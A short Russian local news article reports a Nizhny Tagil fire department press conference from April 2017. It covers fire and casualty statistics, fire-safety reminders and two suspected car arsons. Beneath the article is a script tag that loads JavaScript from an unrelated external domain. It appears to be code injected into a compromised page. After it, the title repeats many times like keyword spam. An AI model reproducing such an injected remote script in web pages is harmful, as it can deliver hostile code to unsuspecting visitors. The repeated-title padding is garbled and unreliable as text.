Вы здесь

Пресс-конференция пожарных

10.04.2017 18:14

По словам начальника 9 отряда УФПС по Свердловской области Олега Полевщикова: « с начала года в Нижнем Тагиле произошло 55 пожаров. Зарегистрировано 129 загораний, 6 человек погибли, 9 получили травмы, 29 спасены. В основном, все цифры с уменьшением. Единственное, только, вот, увеличение, это по гибели. В основном, безусловно, пожары происходят у нас, как и всегда, в жилье. Хотелось бы обратить внимание жителей, просто, на соблюдение правил пожарной безопасности элементарных».
В преддверии пожароопасного периода специалисты напомнили об административной и уголовной ответственности за нарушение требований пожарной безопасности в лесах и неосторожное обращение с огнём. Тагильчан призвали принять участие в профилактических мероприятиях, в частности, очистке территории от мусора. Кроме того, последовал комментарий двух предполагаемых поджогов автомобилей в конце минувшей недели, в результате чего повреждены 5 машин.

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных Пресс-конференция пожарных